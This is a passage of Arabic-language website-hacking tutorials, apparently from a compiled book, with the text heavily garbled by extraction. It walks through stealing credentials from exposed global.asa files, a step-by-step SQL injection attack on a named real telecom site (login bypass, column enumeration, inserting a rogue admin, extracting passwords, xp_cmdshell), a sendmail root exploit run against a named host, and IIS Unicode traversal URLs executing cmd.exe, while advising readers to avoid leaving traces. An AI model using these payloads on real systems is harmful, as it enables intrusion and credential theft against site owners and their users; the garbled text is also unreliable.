البيانات التى تحتويها ‪..+‬الثغرة‬ ‫هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ‪ .

"_LinuxRay".asa‬‬ ‫‪global.sql‬‬ ‫‪global-direct.inc.inc#--‬‬ ‫وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات‬ ‫‪global.‬هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم‬ ‫المستخدم وكلمة المرور‬ ‫اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع ‪.PWD=.asa‬‬ ‫ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين ‪SQL‬‬ ‫وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي ‪:‬‬ ‫‪global.APP=Microsoft (R) Developer‬‬ ‫‪"Studio.htr‬‬ ‫‪223‬‬ .asa+.inc‬‬ ‫>!‪<--"include file = "database.asa‬‬ ‫‪global. "6666666‬‬ ‫‪<%‬‬ ‫‪----------------------------------------------------------------‬‬‫في الكود السابق ترى ان اسم المستخدم هو _‪LinuxRay‬‬ ‫وكلمة السر هي ‪6666666‬‬ ‫‪-----------------------------------------------------------------‬‬ ‫الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ‪ ASP‬مثل التي ‪:‬‬ ‫‪'AMicrosoft VBScript runtime error '800a01a8‬‬ ‫‪'Object required: 'Conn‬‬ ‫‪filename.‬‬ ‫وممكن ان ترى مثل هذا المر في صفحة ‪ASP‬‬ ‫عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف ‪database.UID=sa.SERVER=xxx.WSID=xxx.Open "DRIVER=SQL‬‬ ‫‪Server. line 5/‬‬ ‫هناك ملف ينتهي بامتداد *‪ inc.asa‬‬‫‪milion.asa++‬‬ ‫‪beforemilion-global.Connection‬‬ ‫‪DB.‫>‪%‬‬ ‫‪("Set DB= Server.CreateObject("ADODB.DATABASE=moe_dbs".

1‬ادخل اسم الموقع في صندوق ‪Select or enter server name‬‬ ‫‪ .‫هناك ثغرة قديمة في ‪ IIS 3‬وهي ان تضيف بعد صفحة ‪ ASP‬هذا الرمز ‪ data$::‬كما يلي‬ ‫‪file.‬‬ ‫لقد اقتربنا من النهاية ‪ .‬ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟‬ ‫بعدها الدخول على قاعدة ال ‪!! SQL‬‬ ‫هناك عدة برامج تدخل على قاعدة البينات انا استخدم ‪ Visual interdev 6.3‬كلمة السر ‪Password‬‬ ‫ملحظة ) قم بإزالة الصح من مربع ‪(Blank Password‬‬ ‫اضغط في البداية على ‪ Test Connection‬في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذه‬ ‫العبارة ‪Test Connection Succeeded‬‬ ‫فمعناه ان التصال بقاعدة البيانات تم بنجاح‪.asp::$data‬‬ ‫هذه الثغرة لتعمل ال على ‪ IIS 3‬فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر ‪.0‬لكني مازلت افضل‬ ‫استخدام البرنامج السهل ‪ACCESS 2000‬‬ ‫كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة‬ ‫‪File‬‬ ‫اختر‬ ‫‪New‬‬ ‫ومن قائمة الملفات الجديدة اختار‬ ‫‪(Project (Exiting Data‬‬ ‫اي مشروع قاعدة بيانات موجودة ‪.‬‬ ‫انتهى‪،،،‬‬ ‫" درس مفصل عن الـ ‪" SQL‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫‪224‬‬ ..‬‬ ‫سيظهر لك مربع لنشاء الملف اختر‬ ‫‪Create‬‬ ‫اي انشاء‬ ‫الن سترى مربع‬ ‫‪Data Link Properties‬‬ ‫تحتاج فقط لثلث معلومات اسم الموقع او الي بي ‪ -‬اسم المستخدم ‪ -‬كلمة المرور‬ ‫‪ .2‬اسم المستخدم في ‪User Name‬‬ ‫‪ .‬‬ ‫يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة ‪:‬‬ ‫‪Select the data base on the server‬‬ ‫واضغط على ‪ OK‬او موافق ‪..

asp?pagenum=25‬‬ ‫عند دخوله فأنه يطلب منك أسم مستخدم وكلمة مرور !!!!‬ ‫دائما في الحاله هذه أول ما يتبادر لنا هو الـ ‪SQL injection‬‬ ‫نقوم بتجربة‬ ‫أسم مستخدم ‪' :‬‬ ‫وكلمة مرور ‪' :‬‬ ‫فنحصل على الخطأ التالي‬ ‫اقتباس‪:‬‬ ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬ ‫‪''80040e14‬‬ ‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬ ‫‪.‬‬ ‫‪SQL Server .com.sa‬‬ ‫عند الدخول للصفحة الرئيسيه نجد رابط يختص بمقدمي خدمة أنترنت في السعوديه‬ ‫وهو ‪http://www.sa/arabic/scripts/ar_frame.asp. MySQL. line 33/‬‬ ‫وفي بعض الحالت يظهر الخطا التالي‬ ‫‪225‬‬ .Oracle‬‬ ‫يتم أستخلص المعلومات المطلوبه وترك البقيه‬ ‫حيث تأخذ معلومات من المستخدم ومن ثم تعالج ويستخدم بعضها في تكون‬ ‫أوامر الـ ‪ SQL‬ليتم أستخلص البيانات أو التأكد من صحة بعض المدخلت لبناء‬ ‫الصفحة المطلوبه أو قبول المستخدم أو رفضه‬ ‫دائما يتم طلب أسم مستخدم وكلمة مرور في الصفحات التي تخولك بعمل عمل ل‬ ‫يقوم به إل من قام صاحب الموقع بإعطائه الصلحيه للقيام بها‬ ‫كأن يقوم بحذف موضوعي ‪ (:‬أو تثبيته في القائمه ‪((((:‬‬ ‫حيث يتم التأكد من وجود أسم المستخدم في قاعدة البيانات وأن كلمة المرور المعطاه مطابقه لتلك الموجوده‬ ‫بجانب أسم المستخدم‬ ‫حيث يتم أخذ معلومه وتضمينها في أمر الـ ‪ SQL‬الذي يقوم بالتأكد من وجودها وصلحيتها‬ ‫ولكن يجب الحذر عند كتابة سكربت يقوم بتوثيق المستخدم للتأكد من أنه مخول له بالدخول للصفحه المحميه‬ ‫أم ل‬ ‫وذلك بالتأكد من نظافة القيم المستقبله من المستخدم وخلوها من أي رموز من شأنها أن تجعل أمر الـ ‪SQL‬‬ ‫خاطئ‬ ‫في بنائه أو القيام بأي أمر غير مسموح به‬ ‫سنتكلم الن عن ما يسمى ‪SQL injection‬‬ ‫حيث أنه ضعف في كتابة سكربت التوثيق وأيضا بوجود موقع للتجربه‬ ‫وهو موقع شركة التصالت السعوديه‬ ‫عنوان الموقع ‪/http://www.' '' quotation mark before the character string‬‬ ‫‪arabic/Scripts/ar_csd_reply.‫>ةةةةةة‪< hish_hish :‬‬ ‫أتجهت غالبية المواقع لستخدام صفحات ديناميكيه ومنها ما نحن موجودين فيه ‪(:‬‬ ‫وتستخدم قواعد بيانات فيها كم كبير من المعلومات ‪.stc.com.‬‬ ‫وعن طريق سكربت مكتوب بإحدى لغات الويب الديناميكيه ‪ PHP‬أو ‪ASP‬‬ ‫والتي تعمل جمبا إلى جمب مع محركات قواعد البيانات ‪.stc.

SQL‬‬ ‫>‪ <field from web form‬يحل محلها ما أدخله المستخدم في صفحة التحقق من صلحيته‬ ‫في تجربتنا عندما قمنا بإدخال ' كإسم مستخدم وبالمثل لكلمة المرور فأن أمر الـ ‪ SQL‬أصبح بالشكل‬ ‫التالي ‪:‬‬ ‫‪:code‬‬ ‫‪226‬‬ .asp.''=before the character string ''' AND Password‬‬ ‫‪admin/admin.‬‬ ‫غير ذلك سيتم إرجاع ‪ FALSE‬وسيتم رفض الدخول‬ ‫ملحظه ‪ :‬يجب أن يكون لديك ولو القليل من المعرفه بأوامر الـ ‪.‫اقتباس‪:‬‬ ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬ ‫‪''80040e14‬‬ ‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬ ‫‪quotation mark‬‬ ‫‪. line 13/‬‬ ‫وفي الخطأ هذا حصلنا على جزء من أمر الـ ‪ SQL‬وأيضا أسم أحد العمده في الجدول‬ ‫وهو ما يؤكد أمكانية عمل ‪ inject‬للـ ‪ SQL Query‬المستخدمه للتحقق صلحية أسم المستخدم وكلمة‬ ‫المرور المدخله ‪.‬‬ ‫إذن لنتكلم عن الـ ‪ SQL injection‬بشيء من التفصيل‬ ‫لو كان لدينا سكربت يقوم بالتأكد من صلحية اسم المستخدم وكلمة المرور المدخله من المستخدم قأننا‬ ‫سنتحقق منها بالطريقة التاليه‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE User_Name='<field from web‬‬ ‫‪'<form>' AND Password='<field from web form‬‬ ‫‪}( if( TRUE‬‬ ‫‪Login OK‬‬ ‫{‬ ‫‪} else‬‬ ‫‪Login FAILD‬‬ ‫{‬ ‫عند قيام أحد المسموح لهم بالدخول للصفحة المحميه فأنه يقوم بكل تأكيد بتوثيق نفسه قبل أن يسمح له‬ ‫بالدخول‬ ‫فعند قيامه بأدخال أسم المستخدم وكلمة المرور الخاصه به‬ ‫أسم المستخدم ‪admin :‬‬ ‫كلمة المرور ‪t0ps3cr3t :‬‬ ‫فإن شكل امر الـ ‪ SQL‬سيصبح بالشكل التالي ‪:‬‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE Users_Name='admin' AND‬‬ ‫‪'Password='t0ps3cr3t‬‬ ‫وعند وجود سطر في جدول ‪ User‬تحقق فيه الشرط وهو أن يكون اسم المستخدم ‪ admin‬وكلمة المرور‬ ‫‪t0ps3cr3t‬‬ ‫فأن المر سيقوم بإرجاع قيمة ‪ TRUE‬أي أن المستخدم مخول بالدخول ‪.

..‬حيث يمكننا الستعاضه عن ما أدخلناه قبل قليل‬ ‫بالمدخلت التاليه‬ ‫أسم مستخدم ‪--'blah' OR '1'='1 :‬‬ ‫وكذلك كلمة المرور ) في بعض الحالت يمكنك إهمال كتابة كلمة مرور لن ‪ --‬ستهملها لنها تأتي بعد اسم‬ ‫المستخدم في أمر الـ ‪SQL‬‬ ‫توجد طريقه مريحه جدا ومضمونه بحيث أنك لن تحتاج لتخمين أحد أسماء العمده‬ ‫وهي أستخدام ‪having clause‬‬ ‫بالطريقه التاليه‬ ‫أسم مستخدم ‪'having 1=1--‬‬ ‫حيث سنحصل على رسالة خطأ كالتاليه‬ ‫‪'Microsoft OLE DB Provider for ODBC Drivers error '80040e14‬‬ ‫‪227‬‬ ..‫‪'=SELECT * from Users WHERE User_Name=' ' ' AND Password‬‬ ‫' '‬ ‫ونلحظ أننا قمنا بإغلق علمة التنصيص الولى وبقي علمة تنصيص لم تغلق بعد‬ ‫وهو ما أدى لظهور رسالة الخطأ !!‬ ‫الن نقوم بتجربة ٍام مستخدم ‪blah' OR '1'='1 :‬‬ ‫ومثلها لكلمة المرور‪.‬‬ ‫يجب التنبه لنه ربما يكون الشرط في أمر الـ ‪ SQL‬وهو ما يأتي بعد ‪ WHERE‬يتحقق من عدة أشياء‬ ‫لذلك نستخدم ‪ (two dashes) --‬ليتم إهمال بقية السطر ‪ ..‬‬ ‫فيصبح شكل أمر الـ ‪SQL‬‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND‬‬ ‫‪'Password='blah' OR '1'='1‬‬ ‫لنحلل المر كل جزء على حدا‬ ‫‪SELECT * from Users‬‬ ‫تعني أختر جميع السطور من الجدول ‪Users‬‬ ‫‪'WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1‬‬ ‫في هذا الجزء نقوم بتحديد السطر الذي سنقوم بإختياره وهو الذي تتحقق فيه الشروط‬ ‫'‪'blah' OR '1'='1‬‬ ‫هنا بوجود ‪ OR‬لم تصبح قيمة نصيه ولكن أصبحت شرط‬ ‫يصبح الشرط صحيح إذا كان طرف واحد على القل من الطراف المشتركه في الشرط صحيح‬ ‫وفي حالتنا فإن الطرف الول هو '‪'blah‬‬ ‫وهو بدون الخوض في تفاصيل لسنا في صددها الن يعبر عن قيمة صحيحه ‪TRUE‬‬ ‫والطرف الخر هو '‪'1'='1‬‬ ‫يمكنك الجابة عن إذا كانت ‪ 1‬مساويه لـ ‪ 1‬أم ل !!!!‬ ‫إذا سيكون شكل الشرط بعد تحليله هو ‪TRUE OR TRUE‬‬ ‫وبالتالي فإن النتيجه النهائيه للشرط هي ‪TRUE‬‬ ‫ونفس التفاصيل تحدث لكلمة المرور‬ ‫ملحظه مهمه جدُا‪ :‬القيمه ‪ TRUE‬التي نحصلها من الشرط ليست مساويه للكلمه ‪ TRUE‬التي نكتبها على‬ ‫لوحة المفاتيح الخاصه بنا‬ ‫لذلك ل تحاول إستخدام أسم مستخدم ‪ TRUE‬وكلمة مرور ‪ TRUE‬لتمام الـ ‪SQL injection‬‬ ‫الشرط السابق سيقوم بأختيار أول سطر من الجدول ‪ Users‬ويرجع محتوياته في مصفوفه‬ ‫وبالتالي في بعض الحالت ستجد أنك قد أستطعت الدخول للصفحة المحميه‬ ‫ولكن في حالت أخرى ل‬ ‫لنكمل التفاصيل ‪.

Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.UserID' is invalid in the select list because it is not
.contained in an aggregate function and there is no GROUP BY clause
Arabic/Scripts/ar_csd_reply.asp, line 33/
‫وبها أسم الجدول وأيضا أسم أول عمود‬
‫بعدها لنستطيع الحصول على اسماء بقية العمده‬
group by ‫سنستخدم‬
‫بالشكل التالي‬
'group by cs_isp_user.UserID-passwd ‫بعدها سنحصل على عمود أسمه‬
‫فنستخدمه للحصول على اسم العمود اللي يليه بالشكل التالي‬
'group by cs_isp_user.UserID,cs_isp_user.passwd-! ‫ونكرر زيادة أسم كل جدول مع العمود إلى أن نحصل على صفحة تخبرنا بأن أسم المستخدم خاطئ‬
‫نحتاج الن أن نقوم بجمع أكبر قدر ممكن من أسماء العمده في هذا الجدول‬
: ‫نقوم بإدخال التالي‬
--(blah' group by (username : ‫أسم مستخدم‬
: ‫فنحصل على الخطأ التالي‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Invalid]
.'column name 'username
arabic/Scripts/ar_csd_reply.asp, line 33/

username ‫وهو ما يفيد بأنه ل يوجد عمود في هذا الجدول له السم‬
password ,username,id,userid,email ‫نقوم بتجربه السماء الشائعه مثل‬
first_name,
‫ فأننا نحصل على خطأ أخر وهو ما نبحث عنه‬userid ‫عند تجربتنا لـ‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.passwd' is invalid in the select list because it
is not contained in either an aggregate function or the
.GROUP BY clause
arabic/Scripts/ar_csd_reply.asp, line 33/

228

‫هنا حصلنا على معلومتين وهي أسم الجدول وهو ‪cs_isp_user‬‬
‫وأيضا أسم أحد العمده وهو ‪passwd‬‬
‫نقوم الن بتكرار العمل السابق ولكن بإستخدام اسم العمود الجديد‬
‫فنقوم بإدخال أسم المستخدم التالي ‪--(blah' group by (passwd :‬‬
‫فنحصل على الخطأ التالي ‪:‬‬
‫اقتباس‪:‬‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e14‬‬
‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
‫‪'cs_isp_user.UserID' is invalid in the select list because it is‬‬
‫‪not contained in either an aggregate function or the GROUP‬‬
‫‪.BY clause‬‬
‫‪arabic/Scripts/ar_csd_reply.asp, line 33/‬‬

‫حصلنا على أسم عمود وهو ‪ UserID‬وهو نفسه ما قمنا بتخمينه وهو ‪userid‬‬
‫تجدر الشاره إلى أن ‪ MS SQL Server‬ليس حساس لحالة الحرف ‪(:‬‬
‫نلحظ أننا سنكون في حلقه غير منتهيه ول نحصل إل على أسماء الجداول ‪ UserID‬و ‪passwd‬‬
‫إذن الجدول ل يحوي إل على عمودين وهي التي حصلنا عليها‬
‫إذن في الحاله هذه نقوم بأدخال مستخدم جديد للجدول وبعدها نقوم بالدخول بشكل طبيعي من الصفحه‬
‫الخاصه بتسجيل الدخول ‪(:‬‬
‫سنقوم بكتابة التالي في خانة أسم المستخدم ‪blah' INSERT INTO :‬‬
‫‪cs_isp_user(UserID,passwd‬‬
‫( ‪--('VALUES('M_3','hi‬‬
‫حيث سيتم إضافة مستخدم جديد له أسم مستخدم ‪ M_3‬وكلمة مرور ‪hi‬‬
‫وبعدها تستطيع الدخول للصفحة المحميه بهذه البيانات على أنك مخول له بالدخول‬
‫في مثالنا )شركة التصالت( أنتهينا من استغلل أمكانية عمل ‪ inject‬لها ولكننا سنكمل الحديث عن طريقه‬
‫ممتعه لكي نستطبع قرائة اسماء المستخدمين وكلمات مرورهم وبعدها تستطيع الدخول بأي منها دون إضافة‬
‫نفسك‬
‫وهو المر الذي لن يضع شكوك حول وجود لشخص مشبوه‬
‫سنكمل ما بدأناه ولكن بإضافة عمود أخر له السم ‪ id‬وهو رقم تسلسلي لكل مستخدم ) تذكر أنه رقم(‬
‫إذن لدينا جدول أسمه ‪user‬‬
‫يحوي العمده التاليه‬
‫‪ id‬وهو رقم صحيح‬
‫‪ username‬وهو قيمة نصيه ) القيم النصيه يمكن أن تحوي أرقام( مثال ‪admin1‬‬
‫‪ passwd‬وهي أيضا قيمه نصيه‬
‫نجرب عمل ‪ union‬لقيمه نصيه وتحويلها إلى قيمة عدديه ) لن يتم التحويل ولكنه سيخرج رساله خطأ‬
‫ثمينه جدا(‬
‫ندخل اسم المستخدم ‪blah' union SELECT username FROM user :‬‬
‫و سنحصل على رسالة خطأ ل تفيدنا في شيء‬
‫رسالة الخطأ هي‬
‫اقتباس‪:‬‬

‫‪229‬‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]All]
queries in an SQL statement containing a UNION operator
must have an equal number of expressions in their target
.lists
admin/admin.asp, line 13/

‫ مره واحد فتصبح بالشكل التالي‬id ‫نقوم بزيادة‬
blah' union SELECT username,username FROM user
‫فنحصل على نفس رسالة الخطأ‬
‫نتابع الزياده إلى أن نحصل على رسالة خطأ مختلفه‬
‫لنفترض أننا حصلنا على رسالة الخطأ الجديده عند أدخال اسم المستخدم التالي‬
blah' union SELECT username,username,usernam
e,username,username FROM user
‫فنحصل على رسالة الخطأ التاليه‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e07
Microsoft][ODBC SQL Server Driver][SQL Server]Syntax]
error converting the
.varchar value 'Lame_Admin' to a column of data type int
admin/admin.asp, line 13/

‫( حصلنا على أول أسم مستخدم وهو عادًة ما يكون للدمن‬:
‫ أن يقوم بتحويل قيمة نصيه )وهي‬SQL ‫وسبب ظهور هذا الخطأ هو لننا نطلب من محرك‬
(int )‫( إلى قيمة عدديه صحيحه‬Lame_Admin
‫ إلى قيمة عدديه‬Lame_Admin ‫ لذلك يقوم بأخبارك أنه ل يستطيع تحويل‬, ‫وهو الشيء الغير مسموح‬
(: ‫ بعمله‬microsoft ‫( هذا أذكى شي قامت‬: ‫صحيحه‬
‫الن حصلنا على أسم المستخدم وسنحاول الحصول على كلمة المرور‬
blah' union SELECT passwd,passwd,passwd,pass: ‫ندخل أسم المستخدم التالي‬
wd,passwd FROM user
‫بنفس العدد السابق عند حصولنا على أسم المستخدم‬
‫سنحصل على هذا الخطأ‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error

230

‫‪''80040e07‬‬
‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
‫‪error converting the‬‬
‫‪.varchar value 'stupid' to a column of data type int‬‬
‫‪admin/admin.asp, line 13/‬‬

‫حصلنا على أسم المستخدم وكلمة المرور ويمكننا تسجيل الدخول للصفحة المحميه بدون وجود أي أثر لنا‬
‫إل إذا كانت الصفحه المحميه عند الدخول لها تقوم بطباعة بعض المعلومات مثل رقم اليبي لخر شخض قام‬
‫بالدخول بإسم المستخدم هذا‬
‫عندها فكر بما ستقوم به بنفسك‬
‫بقي أتكلم عن الـ ‪Stored Procedure‬‬
‫وهي كتشبيه أقرب إلى أدوات موجوده مسبقا ‪ Built-in‬تقوم بعمل محدد عند طلبها‬
‫ستستطيع الستفاده من الـ ‪ Stored Procedure‬إذا كان الـ ‪ SQL Server‬يعمل على المستخدم ‪sa‬‬
‫أو إذا كان المستخدم الذي يعمل عليه الـ ‪ SQL Server‬تم السماح له بٍاستخدامها‬
‫لذلك فأنت محظوظ عند حصولك على ‪ SQL Server‬بهذه المكانيات‬
‫يوجد أكثر من ‪Stored Procedure 100‬‬
‫في الجدول التالي أهمها‬
‫‪---------------------------+‬‬
‫‪+------------------------------------------------------------------------------+‬‬
‫| ‪ |----------xp_cmdshell‬تمرير أمر لنظام التشغيل ) يتم تنفيذه على حسب صلحيات‬
‫المستخدم(‪|-------‬‬
‫| ‪ |-----------xp_regread‬قراءة قيمة مفتاح في‬
‫الريجستري‪|--------------------------------------------‬‬
‫| ‪ |----xp_regdeletekey‬حذف مفتاح من‬
‫الريجستري‪|-------------------------------------------------‬‬
‫| ‪ |-xp_regdeletevalue‬حذف قيمة مفتاح من‬
‫الريجستري‪|--------------------------------------------‬‬
‫| ‪ |---------- xp_regwrite‬للكتابة في‬
‫الريجستري‪|-------------------------------------------------------‬‬
‫| ‪ |--xp_servicecontrol‬لبدأ أو أنهاء خدمة على‬
‫السيرفر‪|--------------------------------------------‬‬
‫‪----------------------------+‬‬
‫‪+-----------------------------------------------------------------------------+‬‬

‫أما طريقة الستفاده من أي من هذه الـ ‪ Procedure‬فهي بالشكل التالي‬
‫'‪exec master..xp_cmdshell 'dir‬‬
‫هذا مثال لطريقة أستخدام ‪ xp_cmdshell‬والبقيه مثله‬
‫عدا الكتابة في الريجستري فهو بالشكل التالي‬
‫'‪exec master..xp_regwrite 'REGISTERY KEY' VALUE‬‬
‫‪231‬‬

‫أيضا بقي الشاره إلى أنه بأمكانك قراءة كود ملفات ‪ asp‬التي يعمل عليها الموقع عن طريق إضافة جدول‬
‫جديد ومن ثم نسخ كود صفحة ‪ asp‬ووضعه‬
‫في هذا الجدول بالطريقة التاليه‬
‫))‪CREAT TABLE M_3 ( source varchar(8000‬‬
‫هذا السطر يقوم ببناء الجدول وأسم الجدول ‪ M_3‬وبداخله عمود واحد من النوع ‪ varchar‬حجمه ‪8000‬‬
‫بايت‬
‫بعد ذلك بأمكانك الن إضافة أي ملف على السيرفر إلى هذا الجدول ومن ثم قرائته بالشكل التالي‬
‫'‪bulk insert M_3 from 'c:\InetPub\wwwroot\login‬‬
‫‪asp.‬‬
‫ولقرائة ما تم نسخه يمكنك ذلك عن طريق رسائل الخطأ اللي تكلمنا عنها في الموضوع السابق‬
‫أسهلها هو عمل ‪ union‬حيث يتم توليد رسالة خطأ بها ما تم نسخه‪.‬‬

‫انتهى‪،،،‬‬

‫" درس لحتراف الهاك في اختراق المواقع "‬
‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬
‫>ةةةةةة‪< CONIK :‬‬
‫أن شاء ال في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن الختراق‬
‫في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن قلنا‬
‫في الدرس الول الى كان عن اختراق الجهزة أنه الى بى هو الباب والبورت هو المفتاح له‬
‫بس في أختراق المواقع يوجد لنا باب ولكن المفتاح يختلف وهو الثغرات ومافي اختراق في الدنيا‬
‫بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى ‪-:‬‬
‫س ‪ -:1‬طيب ممكن تقول لى أيش هي الثغرات يعنى تعريف لها ؟؟‬
‫جـ‪ -:‬الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة‬

‫‪232‬‬

‫التى تخليك تتحول من ‪ user‬الى ‪ administrator‬يعنى من مستخدم الى المدير المتصرف وتتضمن‬
‫ويجب‬
‫على الدوام معرفة الثغرات المنيه الجديدة وأستثمارها علشان ل يتنبه أصحاب المواقع بيها‬
‫يرقعوها ) يتم تقفليها (‬
‫وأقرب مثال لهذه الثغرات الضعف المني الذى أكتشف في الباتشى وهو سيرفر يركب على نظام ليونكس‬
‫وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها والستفاده‬
‫منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها‬
‫س ‪ -:2‬طيب كيف انا استثمر الثغره اذا انا لقيتها ؟؟؟‬
‫جـ‪ -:‬من وقت ما أكتشفوا الثغرات كانت نسبة ‪ %99‬من الثغرات تكون سكربتاتها مكتوبه بالغه ‪ C‬وانته‬
‫تحتاج لمعرفة هذه اللغه أو‬
‫عليك تحويلها ‪.‬‬
‫كما أن هناك العديد من الثغرات يحتاج الى ‪ shell‬حتى انته تتمكن من الستفاده من هذه الثغره أو بمعنى‬
‫أخر الضعف‬
‫وعلى سبيل المثال بعض الثغرات الموجوده فى ‪ PHP‬تحتاج الى ‪ Shell PHP‬ومن هذه الكلم‪.‬‬
‫وعلى فكرة الضعف يكون في الصدارات الخاصة‬
‫وكمان في ثغره من نوع ‪ Kernel 2.2.x‬ولكن هذه المرة في نظام تشغيل ليونكس‬
‫) ملحظه هذه الثغرات التى تكون باللغة ‪ C‬تكون سيكربتات توجوده فى الموقع ( وهناك أيضا سيكربتات‬
‫أخرى مكتوبة باللغه ‪perl‬‬
‫ولزم فى هذه الحالة تكون انته مركب لوينكس علشان الوامر وأنا أنصحك تركب ‪linux Redhat 7.3‬‬
‫لنه أفضل من الماندريك وأذكر انه الخ بلك هانتر لمن انا سألته أركب الماندريك ول الريد هات قال لى انه‬
‫الماندريك صورة مبسطه‬

‫‪233‬‬

‫للريد هات بس غير قابله للتطور وأنه الريدهات أقوى وجزاة ال خير على هذه النصيحة نرجع للموضوع‬
‫س ‪ -:3‬كيف أحول لغه البيرل ؟؟‬
‫جـ‪ -:‬الطريقة مره سهله كلها اوامر عادية في البداية انته سوى هذه المر‬
‫‪file.pl/.‬‬
‫تعطيك هذه الرسالة‬
‫‪ ----Access Denied‬هذه الرسالة توضح عدم الموافقه‬
‫أذا صار لك كذا كا عليك سوى كتا بته المر هذه‬
‫‪ -----chmod +x Conik.pl‬لحظ مكان كونيك انته تكتب أسم الملف‬
‫وشغلة مره ثانية وشوف النتجيه راح تكون زى كذا‬
‫‪Conik.pl/. $‬‬
‫س ‪ -:4‬طيب بالنسبة للغة ‪C‬‬
‫جـ‪ -:‬علشان تحويل الملف لزم انته تخلى الملف يكون ملف تنفيذى بهذه المر‬
‫‪ <------ gcc -o Conik Conik.c‬لحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة‬
‫يعنى على سبيل المثال ‪-:‬‬
‫‪gcc -o Conik conik.c‬‬
‫وراح يكون الملف جاهز بعد هذه المر‬
‫‪Conik.c/.‬‬
‫وبعد ماصار الملف جاهز‬
‫‪gcc -o sendmail sendmail.c $‬‬
‫‪sendemail/. $‬‬
‫‪<Usage : sendmail <host> <OS> <user> <password‬‬
‫‪<----- sendmail smtp.israel.com RedHat-7.3 anonymous anonymous /. $‬‬

‫‪234‬‬

‫لحظ انك انته تكتب هنا الموقع الى تبغاه مكان ‪israel‬‬
‫‪...connecting to host‬‬
‫‪...connected‬‬
‫‪id‬‬
‫‪(uid=0(root) gid=0(root‬‬
‫لحظ انه طلب ممنا الملقم للبرنامج ‪ Sendemail‬وكمان طلب نظام التشغيل واليوزر والباسورد‬
‫وبعد هذه كله البرنامج أعطانا أمتياز ‪ Root‬بسبب قيام البرنامج بتنفيذ الـ ‪Exan nofer‬‬
‫ملحظة ل تضن أنه لمن انا حطيت البرنامج ‪ XXX. SENDMAIL‬بدون اى سبب أنا حطيت لك هذه المثال‬
‫لنه هناك ثغره فى هذه البرنامج‬
‫وراح أشرحها لك أن شاء ال تعالى بس كان بدى تحفظ السم هذه ‪(-:‬‬
‫الظاهر انه نحنا أتوغلنا فى الموضوع زايدة عن اللزوم‬
‫س ‪ -:5‬يا ال كل هذه علشان ثغره بس بطلت أنا ما أبغا اتعلم‬
‫جـ‪ -:‬لووووول حبيب البى هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا‬
‫س ‪ -:6‬أيش هي قو ل يا ‪ Conik‬ترى هذه الطريقة يبغالها نظام تشغيل وكمان لغه ‪ C‬و ‪Perl‬‬
‫في تغرات تستخدم من خلل المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملف‬
‫الباسوردات من هذه الطريقه‬
‫ومثال على هذه الثغرات ‪PHP - CGI - UNICODE - VB - etc‬‬
‫س ‪ -:7‬اوووووة ‪ UNICODE‬أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف ويش هى ؟؟؟‬
‫جـ‪ -:‬حبيبى ‪ UNICODE‬هى عبارة عن ضعف في نظام ‪ IIS‬في ‪ Microsoft‬مما تساعد في أختراق‬
‫الموقع بكل سهوله عموما الختراق بهذه الطرق سهل جدا‬
‫مقارنة بالطرق السابقة التى تم ذكرها من قبل وسوف أضع أمثله على ثغرات ‪-: UONICODE‬‬
‫‪vti_bin/.._/‬‬
‫‪%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi‬‬
‫‪\:nnt/system32/cmd.exe?/c+dir+c‬‬
‫‪Rpc/../‬‬
‫‪%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir‬‬
‫‪\:+c‬‬
